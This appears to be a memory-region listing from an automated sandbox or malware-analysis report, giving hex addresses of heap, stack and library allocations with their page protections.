trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
17A22B90000
trusted library allocation
page read and write
2272CAE0000
heap
page read and write
191962F5000
heap
page read and write
15B8160F000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
1919977E000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
191A8191000
trusted library allocation
page read and write
17A21194000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
191983BD000
trusted library allocation
page read and write
5853138000
stack
page read and write
25C67631000
heap
page read and write
BE880FE000
stack
page read and write
FE190FD000
stack
page read and write
17A211DA000
heap
page read and write
15ECF3CD000
heap
page read and write
15ECF402000
heap
page read and write
15BEBF80000
heap
page read and write
2272CD70000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
2272CE45000
heap
page read and write
25C6766A000
heap
page read and write
2BB94704000
heap
page read and write
2272EAE4000
heap
page read and write
19199780000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page execute and read and write
7FF849130000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
2272CB64000
heap
page read and write
15BEBF60000
heap
page read and write
17A3B2A7000
heap
page read and write
4F332FB000
stack
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
15ED1248000
heap
page read and write
2272CB6C000
heap
page read and write
7FF848DF4000
trusted library allocation
page read and write
2273EE7E000
trusted library allocation
page read and write
2272CCF0000
trusted library allocation
page read and write
15B8187F000
trusted library allocation
page read and write
6F686FE000
stack
page read and write
8981CFE000
stack
page read and write
7FF849040000
trusted library allocation
page read and write
FE188FA000
stack
page read and write
17A3B400000
heap
page read and write
27F6D7D5000
heap
page read and write
17A3B51E000
heap
page read and write
15ECF42B000
heap
page read and write
25C6763C000
heap
page read and write
15ECF2E0000
heap
page read and write
7FF848F90000
trusted library allocation
page read and write
15BEC1C0000
trusted library allocation
page read and write
2BB946DA000
heap
page read and write
2273054C000
trusted library allocation
page read and write
15B80001000
trusted library allocation
page read and write
7FF8490A0000
trusted library allocation
page read and write
17A3B422000
heap
page read and write
5852D7F000
stack
page read and write
15ECF3AE000
heap
page read and write
17A211B2000
heap
page read and write
2DF16FE000
stack
page read and write
7FF849150000
trusted library allocation
page read and write
7FF849026000
trusted library allocation
page read and write
25C6762C000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
15B90001000
trusted library allocation
page read and write
2272CE07000
heap
page execute and read and write
25C67689000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
15ECF3CF000
heap
page read and write
25C6768E000
heap
page read and write
17A3B561000
heap
page read and write
2F284656000
heap
page read and write
7FF848E1B000
trusted library allocation
page read and write
15ECF401000
heap
page read and write
55A9A8D000
stack
page read and write
15ECF3F5000
heap
page read and write
2272EAE8000
heap
page read and write
2BB9472A000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
2272ECC0000
heap
page read and write
55A897E000
stack
page read and write
25C676B7000
heap
page read and write
2F284649000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
19198033000
trusted library allocation
page read and write
7B11DCE000
stack
page read and write
27F6D510000
heap
page read and write
2F284880000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
2272CE00000
heap
page execute and read and write
27F6D574000
heap
page read and write
17A22E60000
heap
page read and write
7FF848EB6000
trusted library allocation
page read and write
15BEC030000
trusted library allocation
page read and write
8981BFF000
stack
page read and write
55A8F3B000
stack
page read and write
2BB94680000
heap
page read and write
19197FF0000
trusted library allocation
page read and write
7B110F8000
stack
page read and write
6F687FF000
stack
page read and write
2F284695000
heap
page read and write
191B0320000
heap
page read and write
4AF387B000
stack
page read and write
15ED0E00000
heap
page read and write
25C67682000
heap
page read and write
20D90850000
heap
page read and write
17A3B547000
heap
page read and write
2BB946DD000
heap
page read and write
15B81340000
trusted library allocation
page read and write
1F5CBC50000
heap
page read and write
7FF848EA6000
trusted library allocation
page read and write
25C6769A000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
15ECF3DE000
heap
page read and write
191964D0000
heap
page read and write
25C67650000
heap
page read and write
15ECF2F0000
heap
page read and write
19196410000
heap
page readonly
25C67570000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
191994D2000
trusted library allocation
page read and write
4AF3AF6000
stack
page read and write
7FF848E2D000
trusted library allocation
page execute and read and write
17A3B2F0000
heap
page read and write
2272EAEA000
heap
page read and write
7DF4A1640000
trusted library allocation
page execute and read and write
55A8C3E000
stack
page read and write
17A2487F000
trusted library allocation
page read and write
15ED2BF0000
heap
page read and write
7FF848EE0000
trusted library allocation
page execute and read and write
25C676B7000
heap
page read and write
4AF3DFE000
stack
page read and write
15ECF40C000
heap
page read and write
15ECF3FD000
heap
page read and write
7FF849000000
trusted library allocation
page read and write
22730521000
trusted library allocation
page read and write
15ECF3B5000
heap
page read and write
27F6D53B000
heap
page read and write
15ECF380000
heap
page read and write
19196270000
heap
page read and write
25C67682000
heap
page read and write
6F68AFF000
stack
page read and write
25C67689000
heap
page read and write
17A2492D000
trusted library allocation
page read and write
15B81602000
trusted library allocation
page read and write
585404C000
stack
page read and write
7FF849060000
trusted library allocation
page read and write
7FF848FBA000
trusted library allocation
page read and write
15B818DA000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
2272EF4C000
trusted library allocation
page read and write
55A8FBB000
stack
page read and write
7FF848ED6000
trusted library allocation
page read and write
15BEE046000
heap
page execute and read and write
BE87DFE000
stack
page read and write
22746E6D000
heap
page read and write
6F682F9000
stack
page read and write
7FF848FD2000
trusted library allocation
page read and write
15BEC180000
trusted library allocation
page read and write
25C67575000
heap
page read and write
15ECF3F5000
heap
page read and write
19198060000
heap
page execute and read and write
7FF849140000
trusted library allocation
page read and write
BE5F17F000
unkown
page read and write
BE87CFE000
stack
page read and write
7B11F8E000
stack
page read and write
4AF3B77000
stack
page read and write
7FF849090000
trusted library allocation
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
2272EAE0000
heap
page read and write
15B90011000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
17A3B314000
heap
page read and write
2272CBA6000
heap
page read and write
15BEDFA2000
heap
page read and write
17A24B40000
trusted library allocation
page read and write
1F5CBF50000
heap
page read and write
27F6F080000
heap
page read and write
17A3B5D0000
heap
page read and write
15BEC0DA000
heap
page read and write
17A248D5000
trusted library allocation
page read and write
7B1137C000
stack
page read and write
7FF849002000
trusted library allocation
page read and write
15BEC230000
heap
page read and write
7FF848FA1000
trusted library allocation
page read and write
BE87AFD000
stack
page read and write
15B81606000
trusted library allocation
page read and write
FE18FFE000
stack
page read and write
2F284720000
heap
page read and write
19196480000
heap
page read and write
7FF848E22000
trusted library allocation
page read and write
18E69FF000
stack
page read and write
2BB94711000
heap
page read and write
15BEE0E0000
heap
page read and write
2BB946DC000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
17A24DC3000
trusted library allocation
page read and write
7FF848FD1000
trusted library allocation
page read and write
25C67689000
heap
page read and write
2272EAF7000
heap
page read and write
2272CA70000
heap
page read and write
58530BF000
stack
page read and write
2BB9471A000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
15ECF3B5000
heap
page read and write
15BEC235000
heap
page read and write
7B113FB000
stack
page read and write
15ECF3FD000
heap
page read and write
2272CAA0000
heap
page read and write
22746CD0000
heap
page read and write
89819FE000
stack
page read and write
2272ED45000
trusted library allocation
page read and write
FE18EFE000
stack
page read and write
7FF8490F0000
trusted library allocation
page read and write
5852CFF000
stack
page read and write
19199CE9000
trusted library allocation
page read and write
20D909F0000
heap
page read and write
2272CB7E000
heap
page read and write
15BEE040000
heap
page execute and read and write
7FF8490C0000
trusted library allocation
page read and write
25C67693000
heap
page read and write
227302D8000
trusted library allocation
page read and write
17A2119C000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
19199DAE000
trusted library allocation
page read and write
2273ECE1000
trusted library allocation
page read and write
55A8AFE000
stack
page read and write
22730313000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
7FF849140000
trusted library allocation
page read and write
4AF48CD000
stack
page read and write
17A3B56C000
heap
page read and write
15ECF3B5000
heap
page read and write
17A3B3F0000
heap
page execute and read and write
7FF8490B0000
trusted library allocation
page read and write
25C6766F000
heap
page read and write
19196160000
heap
page read and write
4AF37FE000
stack
page read and write
55A8DBE000
stack
page read and write
585333F000
stack
page read and write
2BB948D0000
heap
page read and write
7FF848EBC000
trusted library allocation
page execute and read and write
5853239000
stack
page read and write
17A232AA000
trusted library allocation
page read and write
2BB94712000
heap
page read and write
25C67682000
heap
page read and write
18E6399000
stack
page read and write
2272CE40000
heap
page read and write
25C6765F000
heap
page read and write
15ECF3DF000
heap
page read and write
There are 838 hidden memdumps, click here to show them.